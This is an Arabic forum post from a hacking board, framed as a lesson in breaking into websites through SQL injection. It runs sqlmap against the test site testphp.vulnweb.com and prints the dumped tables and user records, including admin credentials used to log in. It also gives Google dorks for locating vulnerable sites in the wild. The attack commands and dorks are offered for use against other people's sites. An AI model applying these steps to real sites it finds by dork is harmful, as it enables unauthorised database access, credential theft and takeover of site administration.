اختراق المواقع بثغرة SQL

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

اختراق المواقع بثغرة SQL

مُساهمة من طرف L0v3rBoy في الإثنين أغسطس 07, 2017 9:20 am

بسم الله الرحمن الرحيم
الــسـلام،علــيكم،ورحمة،الله،وبركاتة

اليوم شرحنا عن اختراق المواقع بثغرة حقن قواعد البيانات او كما يسمى SQL INJECTION
للفائدة INJECTION تعني الحقن بالانجليزية
هي مناطق ضعيفه او خطأ برمجي وقع به المبرمج، الذي يؤدي إلى إستغلال ذلك الخطأ لصالح المخترق ،
حيث بإمكان المخترق ان يضيف اكواده الخاصه الذي تساعده في إستغلال الثغره والوصول الى معلومات هامة
طبعا هناك انواع قواعد بيانات كثيره منها :
MYSQL
Microsoft Access
Mysqli
Mssql

واشهر قواعد البيانات هي mysql ربما لكونها قواعد بيانات مجانية وتلاقي دعم كبير.

طبعا هناك نوعين من الحقن :
1- الحقن اليدوي
2-الحقن بستخدام ادوات معينة مثل اداة sqlmap وهي من اشهر ادوات الحقن
وسوف استخدمها في هذا الشرح

ماهي طريقة البحث عن المواقع المصابة؟

عن طريق الدورك (Dork) هو عبارة عن مفتاح البحث
لثغرة معينة فبدونه سيصعب عليك ان تجد موقع مصاب بالثغرة التي تريدها
طرق كتابة الدورك :
للدورك كثير من الطرق لكتابته لكن انا اخترت اشهر الطرق واكثرها استخداما

1-inurl
فهذه الكلمة تعني (في الرابط )
in: وتعني في
url:وتعني الرابط
فاصبحت الكلمة (inurl )


2- intitle
in:في
title:العنوان
في العنوان (intitle)


على سبيل المثال
inurl:prod_detail.php?id=

هذا الدورك راح نستخدمه


ولكن انا لدي موقع راح احقن ويمكن ايضا استخدامه
الان سوف اشرح الحقن وبعدها نشوف الدورك طبعا راح نستخدم اداة sqlmap وللي يستعمل نظام لينكس اما انظمة الويندوز
يمكنك البحث عنهاوتثبيتها
تابعو

طبعا هذا الموقع اللى راح احقنه
http://testphp.vulnweb.com/artists.php?artist=1'

كيف نعرف انه مصاب نضع في اخر الرابط هذه ' علامه التنصيص بحيث تكون بعد الرقم

الموقع مصاب
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62
هذا خطا قاعده البيانات خلينا نحقنه الان

ومثل ماشفنا الحقن

python sqlmap.py -u 'http://testphp.vulnweb.com/artists.php?artist=1' --batch

الحين راح نستخرج قواعد البيانات
python sqlmap.py -u 'http://testphp.vulnweb.com/artists.php?artist=1' --dbs

عندنا قاعدتين بيانات
available databases [2]:
[*] acuart
[*] information_schema


القاعدة الاولى للى تهمنا
الحين نستخرج الجداول

Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+

راح استخرج جميع بيانات المدير


تابعوا
وهذي الجداول للى يهمنا جدول users للى فيه اليوزر والباسورد الخاصه بمدير الموقع

Table: users
[1 entry]
+---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+
| cc | name | cart | pass | uname | phone | email | address |
+---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+
| 1234-5678-2300-9000 | John Smith | 99dabd4f55b4fb74363cf4d58471196d | test | test | 2323345 | email@email.com | 21 street |
+---------------------+------------+----------------------------------+------+-------+---------+-----------------+---------

وهذي البيانات مثل ماشفنا

username:test
password:test
نروح للموقع ونجرب تسجيل الدخول
تمام سجلنا الدخول ويمكننا تعديل بيانات المدير

الحين نشرح الدورك راح استعمل هذا الدورك inurl:prod_detail.php?id=

نكتب قبل الدورك inurl:about.php?cartID=
تقدر تبحث عن الدوركات في جوجل تابعوا

وهكذا
انتهى الدرس
اتمنى انكم استفدتوا واسف على الاطاله
تحياتي لكم
ahmed
H9xsecur!ty

وهذا الفيديو



avatar
L0v3rBoy
Admin

المساهمات : 46
تاريخ التسجيل : 16/07/2017
العمر : 20
الموقع : In my System (;

معاينة صفحة البيانات الشخصي للعضو http://h9xsec.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى